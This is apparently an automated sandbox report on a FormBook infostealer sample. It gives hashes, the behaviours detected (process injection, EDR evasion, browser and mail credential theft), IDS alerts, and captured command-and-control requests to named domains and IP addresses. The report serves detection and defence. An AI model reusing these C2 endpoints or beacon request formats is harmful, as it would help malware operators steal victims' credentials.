Windows Analysis Report
ZcshRk2lgh.exe

Overview

General Information

Sample name: ZcshRk2lgh.exe
(renamed because original name is a hash value)
Original sample name: 29f5edb28740dda7118ed53f1432f02bb5a7f809075efb5d89f90016d0eedd00.exe
Analysis ID: 1588751
MD5: 8c6e69b99c8595bef72154984c028ade
SHA1: 7f63a739e91dab69a4c3f45f3a75f6e0b0cf7b81
SHA256: 29f5edb28740dda7118ed53f1432f02bb5a7f809075efb5d89f90016d0eedd00
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ZcshRk2lgh.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\ZcshRk2lgh.exe" MD5: 8C6E69B99C8595BEF72154984C028ADE)
    • ZcshRk2lgh.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\ZcshRk2lgh.exe" MD5: 8C6E69B99C8595BEF72154984C028ADE)
      • EbjRcLZjak.exe (PID: 5196 cmdline: "C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 1732 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • EbjRcLZjak.exe (PID: 360 cmdline: "C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2860 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
11.2.ZcshRk2lgh.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
11.2.ZcshRk2lgh.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched


                AV Detection

                Source: https://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf Avira URL Cloud: Label: malware
                Source: http://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6LhCYnHJ/8h69BUffqagUGfmBx7ZXwKHkm00gzzb3+tPgf2IZ1KdDH/EL&SVjx=u6ApldVh4TiTWl Avira URL Cloud: Label: malware
                Source: http://www.cssa.auction/rjvg/ Avira URL Cloud: Label: malware
                Source: ZcshRk2lgh.exe ReversingLabs: Detection: 63%
                Source: ZcshRk2lgh.exe Virustotal: Detection: 71%
                Source: Yara matchFile source: 11.2.ZcshRk2lgh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.ZcshRk2lgh.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3092558737.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3095243481.0000000004DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1634959361.00000000036C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
                Source: ZcshRk2lgh.exe Joe Sandbox ML: detected
                Source: ZcshRk2lgh.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ZcshRk2lgh.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EbjRcLZjak.exe, 0000000C.00000000.1551853417.0000000000A1E000.00000002.00000001.01000000.0000000D.sdmp, EbjRcLZjak.exe, 0000000E.00000002.3092131327.0000000000A1E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: ZcshRk2lgh.exe, 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1639130757.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1641179587.000000000329A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ZcshRk2lgh.exe, ZcshRk2lgh.exe, 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1639130757.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1641179587.000000000329A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: ZcshRk2lgh.exe, 0000000B.00000002.1633300230.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094328728.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: ZcshRk2lgh.exe, 0000000B.00000002.1633300230.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094328728.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0092C8D0 FindFirstFileW,FindNextFileW,FindClose,13_2_0092C8D0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then xor eax, eax13_2_00919E40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then mov ebx, 00000004h13_2_032704D8

                Networking

                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49984 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49997 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49974 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50000 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49981 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50008 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50004 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50010 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49979 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49988 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50003 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49992 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49977 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50007 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50001 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50009 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49996 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49993 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50005 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50011 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50013 -> 199.59.243.228:80
                Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
                Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                Source: Joe Sandbox ViewASN Name: BTEL-BG-ASBG BTEL-BG-ASBG
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /p8wp/?SVjx=u6ApldVh4TiTWl&-Jkp4f=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrgjhE6i9RZbIooo4nNVZMxCeQfnPSfF8xtI64tEPJw4kQE2O0gU/hSVG6 HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /47f1/?-Jkp4f=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT7FZPnmIkgRyT2IIjZ1tDFAd1kYY85WNZHG4rc4iGu4bn6UDT+t8IWznL&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /4iun/?-Jkp4f=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywppdeeEuZCatrMvKH/wfqUumWqZ/cxrFwfzjD9bIbXwkyXSm2rk8ZQ8OQa&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.tempatmudisini06.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /lazq/?-Jkp4f=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkSSnofUD+98uCWUF0f78bF04x35xFQJCgARn3b4pm0JSfuygzEuRCwX70&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.hm35s.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /2lci/?SVjx=u6ApldVh4TiTWl&-Jkp4f=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDKFSbRcaZ2/tMcmtbbzmofvFf8wLCxrzsSN20Y6kXBwn9DafM4OtR1q/N HTTP/1.1Host: www.snehasfashion.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /s7xt/?-Jkp4f=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA6U5k7peC8KRmsRBR08PWB1at1OCwwLT81ahb8amXGnyuxVS1phW32kmk&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.sitioseguro.blogAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /gybb/?-Jkp4f=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO/PgAZiplqYTotaLlxgtEc2zUWGdFSG0ILTc8yK+SY1eYqYdzLV7iMcxS&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.windsky.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6LhCYnHJ/8h69BUffqagUGfmBx7ZXwKHkm00gzzb3+tPgf2IZ1KdDH/EL&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.cssa.auctionAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /4r26/?SVjx=u6ApldVh4TiTWl&-Jkp4f=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80ZqplMgmPVg/XIvRa/yHQo/zEfdJf4ghlIiV10Ap+CPKwkexekqfqMwY1 HTTP/1.1Host: www.moviebuff.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /rfcw/?-Jkp4f=1DVwkKEghiueIfFcCwDsNrzmsV0jlWV9KBxp6ijGOBnNtam7Kh7d0pIUvfGZjxRQl5JhLEpebxocieWLqaLg78l2CxgzVsRmsJfD+Nxr9z3yLKNaYWJKA3Al29U6v4dT7qNW9rMO1nzu&SVjx=u6ApldVh4TiTWl HTTP/1.1Host: www.whisperart.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.bookingservice.center
                Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini06.click
                Source: global trafficDNS traffic detected: DNS query: www.hm35s.top
                Source: global trafficDNS traffic detected: DNS query: www.snehasfashion.shop
                Source: global trafficDNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global trafficDNS traffic detected: DNS query: www.windsky.click
                Source: global trafficDNS traffic detected: DNS query: www.cssa.auction
                Source: global trafficDNS traffic detected: DNS query: www.moviebuff.info
                Source: global trafficDNS traffic detected: DNS query: www.whisperart.net
                Source: unknownHTTP traffic detected: POST /47f1/ HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bookingservice.centerContent-Length: 219Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.bookingservice.center/47f1/User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:10:14 GMTserver: LiteSpeed
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 04:10:29 GMTConnection: closeContent-Length: 1245
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 04:10:31 GMTConnection: closeContent-Length: 1245
30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Frame-Options: SAMEORIGINDate: Sat, 11 Jan 2025 04:10:34 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 
